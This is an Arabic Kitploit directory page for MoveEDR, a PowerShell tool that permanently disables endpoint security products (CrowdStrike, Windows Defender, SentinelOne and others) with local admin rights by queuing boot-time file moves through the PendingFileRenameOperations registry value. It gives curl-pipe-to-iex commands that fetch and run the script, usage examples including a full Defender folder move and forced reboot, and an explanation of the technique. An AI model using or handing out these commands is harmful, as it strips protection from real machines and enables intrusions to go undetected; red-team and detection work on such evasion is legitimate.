Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
أدوات/GitHubGitHub/duhirsch/moveedr
أدوات دفاعيةتصعيد الامتيازاتآليات الاستمراريةالتهرب من IDS/IPSما بعد الاستغلالاختبار الاختراقالفريق الأحمرمكافحة الروبوتات
GitHubduhirsch/moveedr

MoveEdr

تعطيل أنظمة EDR بشكل دائم بصلاحية المسؤول المحلي

عرض المستودع
12914منذ 8 أشهرتمت المراجعة من قبل Kitploit

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

MoveEDR

إذا كنت مسؤولًا، يمكنك إجبار Windows على حذف أو نقل المجلدات والملفات مباشرة بعد الإقلاع وقبل بدء الخدمات. يمكن استخدام هذا لتعطيل EDRs.

الاستخدام

[!CAUTION] توجد مشكلة مع CrowdStrike تؤدي إلى حلقة إقلاع مع رسالة "INACCESSIBLE_BOOT_DEVICE". نظريتي هي أن CrowdStrike نفسه أو حل برمجي للنشر يحاول تثبيت ملفات CrowdStrike المفقودة لكنه يفشل ويتركها في حالة معطلة. لست متأكدًا ما إذا كان هذا يعتمد على الوقت المنقضي بعد النقل أو على عدد مرات إعادة التشغيل التي تمت. نقل CrowdStrike بعيدًا لأول مرة وإعادة التشغيل يعملان بشكل جيد. ربما جدولة التراجع بعد أول إعادة تشغيل لتكون في الجانب الآمن.

root@kitploit:~
curl https://raw.githubusercontent.com/duhirsch/MoveEdr/refs/heads/main/MoveEdr.ps1 | iex; MoveEdr
# Reboot!

الخيارات التالية متاحة

  • Undo : التراجع عن نقل EDR، يعمل مع CustomPaths
  • Clear: مسح قيمة مفتاح التسجيل
  • Print: طباعة قيمة مفتاح التسجيل بتنسيق قابل للقراءة بدلاً من سلاسل منتهية ببايتات فارغة
  • CustomOnly: افتراضيًا، تتم إضافة CustomPaths و FullyCustomPaths إلى عمليات النقل المدمجة. يضمن هذا الخيار أن يتم نقل مساراتك المخصصة فقط.
  • CustomPaths: حدد مسارات EDR الخاصة بك بدلاً من استخدام المسارات المدمجة. يقبل المصادر فقط كمدخلات، لتخصيص الوجهة أيضًا استخدم FullyCustomPaths بدلاً من ذلك.
  • FullyCustomPaths : حدد المصادر والوجهات، يمنحك التحكم في الوجهة بدلاً من استخدام $Suffix.
  • Suffix: استخدم لاحقة مختلفة للملفات المنقولة بدلاً من اللاحقة الافتراضية _bak
  • Dump: تفريغ قيم مفتاح التسجيل بتنسيق يمكن استخدامه مع Load
  • Load: تحميل القيم المفروغة مسبقًا لمفتاح التسجيل
  • DefenderHard: بدلاً من نقل ملفات تنفيذية محددة فقط من Windows Defender، انقل مجلد Windows Defender بالكامل
  • IgnoreOld: لا تحتفظ بالقيم الموجودة مسبقًا لمفتاح التسجيل، بل استبدلها دون تمييز
  • Reboot: تنفيذ إعادة تشغيل فورًا بعد تعيين مفتاح التسجيل. قد يقوم بتثبيت تحديثات Windows ويستغرق وقتًا طويلاً لإعادة التشغيل 😬

مثال

root@kitploit:~
curl https://raw.githubusercontent.com/duhirsch/MoveEdr/refs/heads/main/MoveEdr.ps1 | iex
MoveEdr -CustomPaths "C:\Program Files\newAndShinyEdr","C:\Windows\System32\drivers\newAndShinyEdr" -Suffix "_x33f" -IgnoreOld -DefenderHard -Reboot

# Do what you need to do!

# Undo
# Same command as before, just append -Undo
curl https://raw.githubusercontent.com/duhirsch/MoveEdr/refs/heads/main/MoveEdr.ps1 | iex
MoveEdr -CustomPaths "C:\Program Files\newAndShinyEdr","C:\Windows\System32\drivers\newAndShinyEdr" -Suffix "_x33f" -IgnoreOld -DefenderHard -Reboot -Undo

القصة الكاملة

بعض البرامج لديها ميزة تمنع حتى مسؤولي النظام المحليين من إلغاء تثبيتها أو تعطيلها. في أغلب الأحيان تكون هذه البرامج هي برامج مكافحة الفيروسات/EDRs التي تطلب منك كلمة مرور لإلغاء التفعيل حتى عندما تكون مسؤولًا.

إليك حيلة لتعطيلها عن طريق نقل الملفات والمجلدات بحيث لا يمكن تشغيلها عند الإقلاع التالي.

PendMoves من SysInternals يوفر movefile.exe مع الشرح التالي:

هناك العديد من التطبيقات، مثل حزم الخدمة والتحديثات السريعة، التي يجب أن تستبدل ملفًا قيد الاستخدام ولا تستطيع ذلك. لذلك توفر Windows واجهة برمجة التطبيقات MoveFileEx لإعادة تسمية ملف أو حذفه، وتسمح للمتصل بتحديد أنه يريد إجراء العملية في المرة التالية التي يتم فيها إقلاع النظام، قبل أن تتم الإشارة إلى الملفات. يقوم Session Manager بهذه المهمة عن طريق قراءة أوامر إعادة التسمية والحذف المسجلة من قيمة HKLM\System\CurrentControlSet\Control\Session Manager\PendingFileRenameOperations.

كيف يقوم MoveFileEx بذلك بالضبط؟ دعنا نتحقق من الوثائق :

تقوم الدالة بتخزين مواقع الملفات التي سيتم إعادة تسميتها عند إعادة التشغيل في قيمة التسجيل التالية: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session Manager\PendingFileRenameOperations

قيمة التسجيل هذه من النوع REG_MULTI_SZ. تخزن كل عملية إعادة تسمية واحدة من السلاسل التالية المنتهية بـ NULL، اعتمادًا على ما إذا كانت إعادة التسمية حذفًا أم لا:

szSrcFile\0\0
szSrcFile\0szDstFile\0

هذا يعني أنه يمكننا تحقيق نفس تأثير movefile.exe عن طريق إنشاء مفتاح التسجيل PendingFileRenameOperations وإدخال مسارات الملفات/المجلدات التي نريد حذفها بالتنسيق الصحيح REG_MULTI_SZ.

يقوم سكربت MoveEdr بأتمتة إنشاء مفاتيح التسجيل الصحيحة لبرامج مكافحة الفيروسات/EDRs التالية:

  • Bitdefender
  • Blackberry Cylance
  • Checkpoint
  • Cisco
  • CrowdStrike
  • Cyberreason
  • Elastic
  • Fortinet
  • Kaspersky
  • Malwarebytes
  • McAfee (بفضل mschillinger)
  • Palo Alto Cortex
  • Sentinel One
  • Symantec
  • Trellix (سابقًا FireEye، بفضل @0x48756773)
  • Trend Micro Security Agent
  • VMware Carbon Black
تنزيل الأداة
  • Webroot
  • Windows Defender
  • Windows Defender for Endpoint